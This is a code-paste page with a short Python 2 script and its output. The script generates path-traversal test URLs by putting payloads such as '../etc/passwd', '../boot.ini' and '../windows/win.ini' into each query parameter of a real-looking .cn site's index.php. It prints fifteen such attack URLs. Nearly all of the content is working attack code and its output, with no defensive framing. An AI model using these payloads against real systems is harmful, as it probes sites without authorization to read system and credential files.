fork download
copy 
  1. payloads = ('../boot.ini','../etc/passwd','../windows/win.ini','../../boot.ini','../../etc/passwd')
  2.  
  3. s1 = ['123']*5
  4. s2 = ['456']*5
  5. s3 = ['ooo']*5
  6.  
  7. a = zip(payloads, s2, s3) + zip(s1, payloads, s3) + zip(s1, s2, payloads)
  8.  
  9. for item in a:
  10.     x, y, z = item
  11.     print ("http://w...content-available-to-author-only...e.cn/index.php?id=%s&abc=%s&xxx=%s" %(x,y,z))
Success #stdin #stdout 0.01s 7896KB
comments (?)
stdin
copy 
Standard input is empty
stdout
copy 
http://w...content-available-to-author-only...e.cn/index.php?id=../boot.ini&abc=456&xxx=ooo
http://w...content-available-to-author-only...e.cn/index.php?id=../etc/passwd&abc=456&xxx=ooo
http://w...content-available-to-author-only...e.cn/index.php?id=../windows/win.ini&abc=456&xxx=ooo
http://w...content-available-to-author-only...e.cn/index.php?id=../../boot.ini&abc=456&xxx=ooo
http://w...content-available-to-author-only...e.cn/index.php?id=../../etc/passwd&abc=456&xxx=ooo
http://w...content-available-to-author-only...e.cn/index.php?id=123&abc=../boot.ini&xxx=ooo
http://w...content-available-to-author-only...e.cn/index.php?id=123&abc=../etc/passwd&xxx=ooo
http://w...content-available-to-author-only...e.cn/index.php?id=123&abc=../windows/win.ini&xxx=ooo
http://w...content-available-to-author-only...e.cn/index.php?id=123&abc=../../boot.ini&xxx=ooo
http://w...content-available-to-author-only...e.cn/index.php?id=123&abc=../../etc/passwd&xxx=ooo
http://w...content-available-to-author-only...e.cn/index.php?id=123&abc=456&xxx=../boot.ini
http://w...content-available-to-author-only...e.cn/index.php?id=123&abc=456&xxx=../etc/passwd
http://w...content-available-to-author-only...e.cn/index.php?id=123&abc=456&xxx=../windows/win.ini
http://w...content-available-to-author-only...e.cn/index.php?id=123&abc=456&xxx=../../boot.ini
http://w...content-available-to-author-only...e.cn/index.php?id=123&abc=456&xxx=../../etc/passwd
https://ideone.com/Jbfmst
language:
Python (cpython 2.7.16)
created:
9 years ago
visibility:
secret

Share or Embed source code

Discover > Sphere Engine API

The brand new service which powers Ideone!

Discover > IDE Widget

Widget for compiling and running the source code in a web browser!